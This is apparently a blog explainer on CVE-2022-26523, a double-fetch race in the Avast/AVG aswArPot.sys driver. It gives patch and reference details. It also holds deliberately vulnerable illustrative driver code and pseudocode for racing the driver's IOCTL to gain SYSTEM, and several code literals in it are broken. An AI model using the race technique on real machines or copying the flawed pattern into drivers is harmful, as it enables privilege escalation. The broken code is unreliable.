CVE-2022-26523 - How a Double Fetch in Avast/AVG’s Anti-Rootkit Driver Let Attackers Crash or Hijack Windows

In early 2022, security researchers discovered a critical vulnerability in the Avast and AVG antivirus products, identified as CVE-2022-26523. The root of the issue: a “double fetch” bug in their anti-rootkit driver (aswArPot.sys). This bug could let a regular user in Windows execute code as SYSTEM—the most powerful account—or simply crash the operating system. Here’s a deep dive into what went wrong, how it can be exploited, and what you need to know.

Affected Versions: Before 22.1

- Type: Local privilege escalation / Denial of Service (DoS)

What is a Double Fetch?

A double fetch happens when a program fetches data from user memory multiple times without verifying if the data changed in between. In a kernel driver—which should always operate under the assumption that user memory can be tampered with—this can lead to nasty issues like memory corruption.

A simplified (not real source, for illustration only) example might look like this

NTSTATUS aswArPot_HandleSocket(PIRP Irp, PIO_STACK_LOCATION IoStack) {
    UserRequest *userReq = (UserRequest *)Irp->UserBuffer;

    // First fetch: check buffer size
    if (userReq->size > MAX_SIZE) {
        return STATUS_INVALID_PARAMETER;
    }

    // Second fetch: copy data
    char *kernelBuf = ExAllocatePoolWithTag(NonPagedPool, userReq->size, 'Avst');
    if (!kernelBuf) return STATUS_INSUFFICIENT_RESOURCES;

    // Danger: userReq->size could have changed!
    memcpy(kernelBuf, userReq->buffer, userReq->size);

    // ...do stuff with kernelBuf...
}

If an attacker manages to swap out userReq->size in between those two usages, the kernel could end up copying too much or too little data, leading to memory corruption.

In the case of aswArPot.sys, research () pinpointed the vulnerable code to the socket connection handler at offset +xbb94.

Exploitation: How Can an Attacker Use This?

Prerequisite: The attacker must already be able to run code on your system (local access).

Race to change data in user memory between the driver’s fetches.

- Corrupt memory in the kernel, causing a crash (DoS) or—if the attacker is clever—a controlled overwrite for code execution at SYSTEM level.

Full Exploit Chain (Simplified Pseudocode)

// User code -- attacker process

struct SockReq {
    SIZE_T size;
    char *buffer;
};

SockReq req;
req.size = x10;
req.buffer = malicious_buffer;

HANDLE hDevice = CreateFileW(L"\\\\.\\aswArPot", ...);

// Start a thread to call the driver's vulnerable IOCTL
DWORD ioctlThread() {
    DeviceIoControl(hDevice, VULN_IOCTL, &req, sizeof(req), ...);
}

// Start a racing thread to change req.size at just the right moment
DWORD raceThread() {
    Sleep(...); // guessed timing
    req.size = xFFFFFFFF; // increase dramatically!
}

// Launch both
CreateThread(NULL, , ioctlThread, NULL, , NULL);
CreateThread(NULL, , raceThread, NULL, , NULL);

The above is a typical approach: carefully timing the req.size change so that the driver’s two reads get two different values.

Real-World Impact

- Local Privilege Escalation: An attacker could hijack the SYSTEM account, which has full control of the system, bypassing all standard protections and antivirus.
- Denial of Service: Even without privilege escalation, the system can be crashed reliably, leading to loss of data and downtime.

On platforms where the anti-rootkit driver is always loaded, this was a broad, critical risk.

Mitigation

Avast and AVG fixed this issue in version 22.1 (January 2022).
If you use either product, make sure you're up to date.

- Patch notes: Avast Release Notes
- CVE details: NVD entry
- ZDI advisory: ZDI-22-346

Lessons Learned

- Kernel drivers must *always* validate user input, making deep, single-fetch copies and verifying values before using them.

References

- Zero Day Initiative ZDI-22-346 Advisory
- NVD CVE-2022-26523 Entry
- Avast Release Notes
- Double Fetch Vulnerabilities Explained (Intel Blog)

Conclusion

CVE-2022-26523 is a textbook example of how kernel drivers and antivirus code must be written with extreme care. Any time untrusted data is fetched twice, there is a window for disaster. If you use Avast or AVG, upgrading to the latest version is critical. And if you're a developer, always double-check for double fetch issues—it only takes one mistake for attackers to gain total system control.

Timeline

Published on: 05/08/2026 00:00:00 UTC
Last modified on: 05/08/2026 05:16:09 UTC